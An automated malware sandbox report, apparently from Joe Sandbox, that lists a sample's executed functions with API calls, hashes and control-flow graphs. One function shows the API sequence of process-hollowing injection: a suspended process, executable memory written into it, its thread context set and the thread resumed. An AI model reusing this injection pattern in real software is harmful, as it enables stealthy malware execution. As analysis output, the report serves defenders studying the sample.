14327->14340 14331 143dc9 MultiByteToWideChar 14330->14331 14331->14316 14334 1346b3 14333->14334 14335 1346c4 14333->14335 14334->14335 14337 13a859 14334->14337 14335->14314 14338 13efd8 ___free_lconv_mon 14 API calls 14337->14338 14339 13a871 14338->14339 14339->14335 14341 142c3c ctype 14340->14341 14342 143db8 __strnicoll MultiByteToWideChar 14341->14342 14345 142c82 14342->14345 14343 142dfa 14344 134956 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 14343->14344 14346 142e0d 14344->14346 14345->14343 14347 142001 std::_Locinfo::_Locinfo_ctor 15 API calls 14345->14347 14349 142ca8 __alloca_probe_16 14345->14349 14356 142d2e 14345->14356 14346->14309 14347->14349 14348 1346a9 __freea 14 API calls 14348->14343 14350 143db8 __strnicoll MultiByteToWideChar 14349->14350 14349->14356 14351 142ced 14350->14351 14351->14356 14368 13f682 14351->14368 14354 142d57 14357 142de2 14354->14357 14358 142001 std::_Locinfo::_Locinfo_ctor 15 API calls 14354->14358 14361 142d69 __alloca_probe_16 14354->14361 14355 142d1f 14355->14356 14360 13f682 std::_Locinfo::_Locinfo_ctor 7 API calls 14355->14360 14356->14348 14359 1346a9 __freea 14 API calls 14357->14359 14358->14361 14359->14356 14360->14356 14361->14357 14362 13f682 std::_Locinfo::_Locinfo_ctor 7 API calls 14361->14362 14363 142dac 14362->14363 14363->14357 14377 143e34 14363->14377 14365 142dc6 14365->14357 14366 142dcf 14365->14366 14367 1346a9 __freea 14 API calls 14366->14367 14367->14356 14380 13f1b4 14368->14380 14371 13f693 LCMapStringEx 14376 13f6da 14371->14376 14372 13f6ba 14383 13f6df 14372->14383 14375 13f6d3 LCMapStringW 14375->14376 14376->14354 14376->14355 14376->14356 14379 143e4b WideCharToMultiByte 14377->14379 14379->14365 14381 13f2b3 std::_Lockit::_Lockit 5 API calls 14380->14381 14382 13f1ca 14381->14382 14382->14371 14382->14372 14386 13f1ce 14383->14386 14385 13f6ea __strnicoll 14385->14375 14387 13f2b3 std::_Lockit::_Lockit 5 API calls 14386->14387 14388 13f1e4 14387->14388 14388->14385 14389->14246 14400 139e1c 14390->14400 14392 1449d0 14393 139e1c __fread_nolock 41 API calls 14392->14393 14394 1449ef 14393->14394 14395 13efd8 ___free_lconv_mon 14 API calls 14394->14395 14396 144984 14394->14396 14395->14396 14397 1449a2 14396->14397 14414 13a8fd LeaveCriticalSection 14397->14414 14399 144990 14399->13732 14401 139e2d 14400->14401 14410 139e29 _Yarn 14400->14410 14402 139e34 14401->14402 14405 139e47 __fread_nolock 14401->14405 14403 13b318 __strnicoll 14 API calls 14402->14403 14404 139e39 14403->14404 14406 139102 __strnicoll 41 API calls 14404->14406 14407 139e75 14405->14407 14408 139e7e 14405->14408 14405->14410 14406->14410 14409 13b318 __strnicoll 14 API calls 14407->14409 14408->14410 14412 13b318 __strnicoll 14 API calls 14408->14412 14411 139e7a 14409->14411 14410->14392 14413 139102 __strnicoll 41 API calls 14411->14413 14412->14411 14413->14410 14414->14399 18330 13f9ed 18331 13f9f9 ___scrt_is_nonwritable_in_current_image 18330->18331 18342 13a8b5 EnterCriticalSection 18331->18342 18333 13fa00 18343 1456ef 18333->18343 18335 13fa1e 18367 13fa44 18335->18367 18342->18333 18344 1456fb ___scrt_is_nonwritable_in_current_image 18343->18344 18345 145704 18344->18345 18346 145725 18344->18346 18348 13b318 __strnicoll 14 API calls 18345->18348 18370 13a8b5 EnterCriticalSection 18346->18370 18349 145709 18348->18349 18350 139102 __strnicoll 41 API calls 18349->18350 18351 13fa0f 18350->18351 18351->18335 18356 13f887 GetStartupInfoW 18351->18356 18352 14575d 18378 145784 18352->18378 18353 145731 18353->18352 18371 14563f 18353->18371 18357 13f8a4 18356->18357 18359 13f938 18356->18359 18358 1456ef 42 API calls 18357->18358 18357->18359 18360 13f8cc 18358->18360 18362 13f93d 18359->18362 18360->18359 18361 13f8fc GetFileType 18360->18361 18361->18360 18363 13f944 18362->18363 18364 13f987 GetStdHandle 18363->18364 18365 13f9e9 18363->18365 18366 13f99a GetFileType 18363->18366 18364->18363 18365->18335 18366->18363 18382 13a8fd LeaveCriticalSection 18367->18382 18369 13fa2f 18370->18353 18372 13ef7b __Getctype 14 API calls 18371->18372 18373 145651 18372->18373 18376 13f5c0 6 API calls 18373->18376 18377 14565e 18373->18377 18374 13efd8 ___free_lconv_mon 14 API calls 18375 1456b3 18374->18375 18375->18353 18376->18373 18377->18374 18381 13a8fd LeaveCriticalSection 18378->18381 18380 14578b 18380->18351 18381->18380 18382->18369

                                                                            Executed Functions

                                                                            Function 00C4018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C402FC
                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00C4030F
                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00C4032D
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C40351
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00C4037C
                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00C403D4
                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00C4041F
                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00C4045D
                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C40499
                                                                            • ResumeThread.KERNELBASE(?), ref: 00C404A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051654125.0000000000C40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                            • String ID: GetP$Load$aryA$ress
                                                                            • API String ID: 2687962208-977067982
                                                                            • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                            • Instruction ID: 49ecbdcd13c0b8f8d31f0baba31c277a032ca4f124ddc8e1482bfe0f1fe5557e
                                                                            • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                            • Instruction Fuzzy Hash: D2B1E67664024AAFDB60CF68CC80BDA77A5FF88714F158524EA1CAB341D774FA418B94
                                                                            Function 0014560E Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 370 14560e-145626 GetPEB 371 145637-145639 370->371 372 145628-14562c call 13f336 370->372 374 14563a-14563e 371->374 375 145631-145635 372->375 375->371 375->374
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
                                                                            • Instruction ID: 9af28f4630563cd1b13032630f3d75952d2d264d059196473a121e5e13df784b
                                                                            • Opcode Fuzzy Hash: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
                                                                            • Instruction Fuzzy Hash: C3E08C32911228EBCB25DB88C904D8AF3ECFB44B00B5200AAF501D3212C370DE00DBD0
                                                                            Function 0013C35D Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
                                                                            • Instruction ID: 08b442c9cf4f4d1efd0abe8490a2d77f45e719aab8232e0a897874793d36aa2f
                                                                            • Opcode Fuzzy Hash: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
                                                                            • Instruction Fuzzy Hash: 6DC08C3400090047CE29891892713A83365B3A7BC2F80048CC4030BA62CB1E9C82DB40
                                                                            Function 0013F1E8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 23 13f1e8-13f1f4 24 13f286-13f289 23->24 25 13f1f9-13f20a 24->25 26 13f28f 24->26 28 13f217-13f230 LoadLibraryExW 25->28 29 13f20c-13f20f 25->29 27 13f291-13f295 26->27 32 13f232-13f23b GetLastError 28->32 33 13f296-13f2a6 28->33 30 13f215 29->30 31 13f2af-13f2b1 29->31 35 13f283 30->35 31->27 36 13f274-13f281 32->36 37 13f23d-13f24f call 13e918 32->37 33->31 34 13f2a8-13f2a9 FreeLibrary 33->34 34->31 35->24 36->35 37->36 40 13f251-13f263 call 13e918 37->40 40->36 43 13f265-13f272 LoadLibraryExW 40->43 43->33 43->36
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,C118BA38,?,0013F2F5,?,?,00000000,00000000), ref: 0013F2A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID: api-ms-$ext-ms-
                                                                            • API String ID: 3664257935-537541572
                                                                            • Opcode ID: 4d2c83241db5f7709d195cad77ecf1589ceb6cd69b95bcb4eec864ec59d86007
                                                                            • Instruction ID: 97e600d4cdb17acb2572cc645635ea72810b38c15bed59a44ab3fa112d4f14fa
                                                                            • Opcode Fuzzy Hash: 4d2c83241db5f7709d195cad77ecf1589ceb6cd69b95bcb4eec864ec59d86007
                                                                            • Instruction Fuzzy Hash: 58212C39E00210EBDF219B64EC41E9B3799AF52764F250238F905A7291DB34ED02C7D1
                                                                            Function 0014C20E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42memorythreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,0014C2FD), ref: 0014C222
                                                                              • Part of subcall function 0014C168: _Deallocate.LIBCONCRT ref: 0014C203
                                                                            • CreateThread.KERNELBASE(00000000,00000000,00000188,00157018,00000000,00000000), ref: 0014C256
                                                                            • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,0014C2FD), ref: 0014C262
                                                                            • CloseHandle.KERNEL32(00000000,?,?,0014C2FD), ref: 0014C269
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocCloseCreateDeallocateHandleObjectSingleThreadVirtualWait
                                                                            • String ID: ole
                                                                            • API String ID: 440434604-1213916275
                                                                            • Opcode ID: ea9fe907fd5c4b929c5549031ee3beb061d7f73b9bba6a56361dad48b42db494
                                                                            • Instruction ID: 8063b708967fe925edc85136329ff571ae3f6c38760d48d88278589768335032
                                                                            • Opcode Fuzzy Hash: ea9fe907fd5c4b929c5549031ee3beb061d7f73b9bba6a56361dad48b42db494
                                                                            • Instruction Fuzzy Hash: 62F027F620111C7FD6113362BC49EBB3A1CDB47BAAF010120FA09930A2CB162D4243B5
                                                                            Function 00142C21 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 51 142c21-142c3a 52 142c50-142c55 51->52 53 142c3c-142c4c call 13b4db 51->53 55 142c64-142c8a call 143db8 52->55 56 142c57-142c61 52->56 53->52 60 142c4e 53->60 61 142c90-142c9b 55->61 62 142dfd-142e0e call 134956 55->62 56->55 60->52 63 142df0 61->63 64 142ca1-142ca6 61->64 68 142df2 63->68 66 142ca8-142cb1 call 134ca0 64->66 67 142cbb-142cc6 call 142001 64->67 76 142cd1-142cd5 66->76 77 142cb3-142cb9 66->77 67->76 78 142cc8 67->78 72 142df4-142dfb call 1346a9 68->72 72->62 76->68 81 142cdb-142cf2 call 143db8 76->81 80 142cce 77->80 78->80 80->76 81->68 84 142cf8-142d0a call 13f682 81->84 86 142d0f-142d13 84->86 87 142d15-142d1d 86->87 88 142d2e-142d30 86->88 89 142d57-142d63 87->89 90 142d1f-142d24 87->90 88->68 93 142d65-142d67 89->93 94 142de2 89->94 91 142dd6-142dd8 90->91 92 142d2a-142d2c 90->92 91->72 92->88 96 142d35-142d4f call 13f682 92->96 97 142d7c-142d87 call 142001 93->97 98 142d69-142d72 call 134ca0 93->98 95 142de4-142deb call 1346a9 94->95 95->88 96->91 109 142d55 96->109 97->95 108 142d89 97->108 98->95 107 142d74-142d7a 98->107 110 142d8f-142d94 107->110 108->110 109->88 110->95 111 142d96-142dae call 13f682 110->111 111->95 114 142db0-142db7 111->114 115 142db9-142dba 114->115 116 142dda-142de0 114->116 117 142dbb-142dcd call 143e34 115->117 116->117 117->95 120 142dcf-142dd5 call 1346a9 117->120 120->91
                                                                            APIs
                                                                            • __alloca_probe_16.LIBCMT ref: 00142CA8
                                                                            • __alloca_probe_16.LIBCMT ref: 00142D69
                                                                            • __freea.LIBCMT ref: 00142DD0
                                                                              • Part of subcall function 00142001: HeapAlloc.KERNEL32(00000000,001321BA,?,?,00135A1A,?,?,?,00000000,?,001319F6,001321BA,?,?,?,?), ref: 00142033
                                                                            • __freea.LIBCMT ref: 00142DE5
                                                                            • __freea.LIBCMT ref: 00142DF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                            • String ID:
                                                                            • API String ID: 1096550386-0
                                                                            • Opcode ID: 0259a6d5f026d732f2b1882758600754817abde557f0b85fbda4d1718814a9f4
                                                                            • Instruction ID: ac0aa534a46f5863042cdcccff39f7a3b086f08e244741700d1bb27848881d54
                                                                            • Opcode Fuzzy Hash: 0259a6d5f026d732f2b1882758600754817abde557f0b85fbda4d1718814a9f4
                                                                            • Instruction Fuzzy Hash: 6A51B3B2A00216AFEF259FA4DC81EBB7AA9EF54354F550129FD08D7120EB31DD90D7A0
                                                                            Function 0013C2E9 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,0013C2E3,00000000,00138F02,?,?,C118BA38,00138F02,?), ref: 0013C2FA
                                                                            • TerminateProcess.KERNEL32(00000000,?,0013C2E3,00000000,00138F02,?,?,C118BA38,00138F02,?), ref: 0013C301
                                                                            • ExitProcess.KERNEL32 ref: 0013C313
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: b9170e18488f480dd8698259bdf4786328e6d08ada63cb50805c4544066aa787
                                                                            • Instruction ID: 5684e868a47dad25c99cb3e007a21f83f19e305085f050f7553d153d45a2277c
                                                                            • Opcode Fuzzy Hash: b9170e18488f480dd8698259bdf4786328e6d08ada63cb50805c4544066aa787
                                                                            • Instruction Fuzzy Hash: D9D09276000508AFCF012FB0FE0D9693F2ABF56345F058010BA0A6B431CB32D9939BC0
                                                                            Function 00144F3F Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 130 144f3f-144f67 call 144a6f 133 144f6d-144f73 130->133 134 14512f-145130 call 144ae0 130->134 136 144f76-144f7c 133->136 137 145135-145137 134->137 138 144f82-144f8e 136->138 139 14507e-14509d call 136090 136->139 141 145138-145146 call 134956 137->141 138->136 142 144f90-144f96 138->142 147 1450a0-1450a5 139->147 145 145076-145079 142->145 146 144f9c-144fa8 IsValidCodePage 142->146 145->141 146->145 149 144fae-144fb5 146->149 150 1450a7-1450ac 147->150 151 1450e2-1450ec 147->151 152 144fb7-144fc3 149->152 153 144fdd-144fea GetCPInfo 149->153 158 1450ae-1450b6 150->158 159 1450df 150->159 151->147 154 1450ee-145118 call 144a31 151->154 155 144fc7-144fd3 call 144b43 152->155 156 144fec-14500b call 136090 153->156 157 14506a-145070 153->157 169 145119-145128 154->169 166 144fd8 155->166 156->155 170 14500d-145014 156->170 157->134 157->145 163 1450d7-1450dd 158->163 164 1450b8-1450bb 158->164 159->151 163->150 163->159 168 1450bd-1450c3 164->168 166->137 168->163 171 1450c5-1450d5 168->171 169->169 172 14512a 169->172 173 145016-14501b 170->173 174 145040-145043 170->174 171->163 171->168 172->134 173->174 175 14501d-145025 173->175 176 145048-14504f 174->176 177 145027-14502e 175->177 178 145038-14503e 175->178 176->176 179 145051-145065 call 144a31 176->179 181 14502f-145036 177->181 178->173 178->174 179->155 181->178 181->181
                                                                            APIs
                                                                              • Part of subcall function 00144A6F: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00144A9A
                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00144D86,?,00000000,?,00000000,?), ref: 00144FA0
                                                                            • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00144D86,?,00000000,?,00000000,?), ref: 00144FE2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CodeInfoPageValid
                                                                            • String ID:
                                                                            • API String ID: 546120528-0
                                                                            • Opcode ID: 501b0bb8c7e3416c002f3b69f0dc7b4f28f4581b2200d08ad716c20544a96771
                                                                            • Instruction ID: 74ec4a0eee595a6e2dc652ba0e99d664775720b2462972035849d0f54ff7c93c
                                                                            • Opcode Fuzzy Hash: 501b0bb8c7e3416c002f3b69f0dc7b4f28f4581b2200d08ad716c20544a96771
                                                                            • Instruction Fuzzy Hash: DE512674A00A455FDB20CF75C8517BAFBF6EF91304F28816EE0868B262E7759945CB90
                                                                            Function 0013F682 Relevance: 3.0, APIs: 2, Instructions: 34COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 183 13f682-13f691 call 13f1b4 186 13f693-13f6b8 LCMapStringEx 183->186 187 13f6ba-13f6d4 call 13f6df LCMapStringW 183->187 191 13f6da-13f6dc 186->191 187->191
                                                                            APIs
                                                                            • LCMapStringEx.KERNELBASE(?,00142D0F,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0013F6B6
                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00142D0F,?,?,00000000,?,00000000), ref: 0013F6D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: String
                                                                            • String ID:
                                                                            • API String ID: 2568140703-0
                                                                            • Opcode ID: 3ae507bc734d5ec56cd7f0ff94a817261bcad915271bc0431d098464d4334628
                                                                            • Instruction ID: 989ed91fe5dd9ba1ce9bf31af2f04c9c4234fa4802eee3781d3cb4fd4f8d1794
                                                                            • Opcode Fuzzy Hash: 3ae507bc734d5ec56cd7f0ff94a817261bcad915271bc0431d098464d4334628
                                                                            • Instruction Fuzzy Hash: 68F0683650011ABBCF125F91EC05DDE3E26BB587A0F058024FE1926130C732C872AB94
                                                                            Function 00144B43 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 192 144b43-144b65 193 144c7e-144ca4 192->193 194 144b6b-144b7d GetCPInfo 192->194 196 144ca9-144cae 193->196 194->193 195 144b83-144b8a 194->195 197 144b8c-144b96 195->197 198 144cb0-144cb6 196->198 199 144cb8-144cbe 196->199 197->197 200 144b98-144bab 197->200 201 144cc6-144cc8 198->201 202 144cc0-144cc3 199->202 203 144cca 199->203 204 144bcc-144bce 200->204 205 144ccc-144cde 201->205 202->201 203->205 206 144bd0-144c07 call 142b18 call 142e0f 204->206 207 144bad-144bb4 204->207 205->196 208 144ce0-144cee call 134956 205->208 218 144c0c-144c41 call 142e0f 206->218 210 144bc3-144bc5 207->210 213 144bb6-144bb8 210->213 214 144bc7-144bca 210->214 213->214 216 144bba-144bc2 213->216 214->204 216->210 221 144c43-144c4d 218->221 222 144c4f-144c59 221->222 223 144c5b-144c5d 221->223 224 144c6d-144c7a 222->224 225 144c5f-144c69 223->225 226 144c6b 223->226 224->221 227 144c7c 224->227 225->224 226->224 227->208
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(E8458D00,?,00144D92,00144D86,00000000), ref: 00144B75
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                                                            • Associated: 00000000.00000002.2051193941.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051314006.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051331641.0000000000189000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2051436268.000000000018C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_130000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Info
                                                                            • String ID:
                                                                            • API String ID: 1807457897-0
                                                                            • Opcode ID: 5f2ff687d9ba4c92b0b688f5948a053ae7de03f2e68229564a95b6425fb5abe2
                                                                            • Instruction ID: bdc4cd5cc049829172a91fa29b9a12037221c364830986cb11c6deec0020e5c2
                                                                            • Opcode Fuzzy Hash: 5f2ff687d9ba4c92b0b688f5948a053ae7de03f2e68229564a95b6425fb5abe2
                                                                            • Instruction Fuzzy Hash: BB5147B15042589BDB218B28CCC4BF67BBCEB55304F2805EDE49AD71A2C334AE46CB20
                                                                            Function 0013F2B3 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 228 13f2b3-13f2db 229 13f2e1-13f2e3 228->229 230 13f2dd-13f2df 228->230 232 13f2e5-13f2e7 229->232 233 13f2e9-13f2f0 call 13f1e8 229->233 231 13f332-13f335 230->231 232->231 235 13f2f5-13f2f9 233->235 236 13f2fb-13f309 GetProcAddress 235->236 237 13f318-13f32f 235->237 236->237 238 13f30b-13f316 call 13ba6a 236->238 239 13f331 237->239 238->239 239->231
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2051289979.0000000000131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
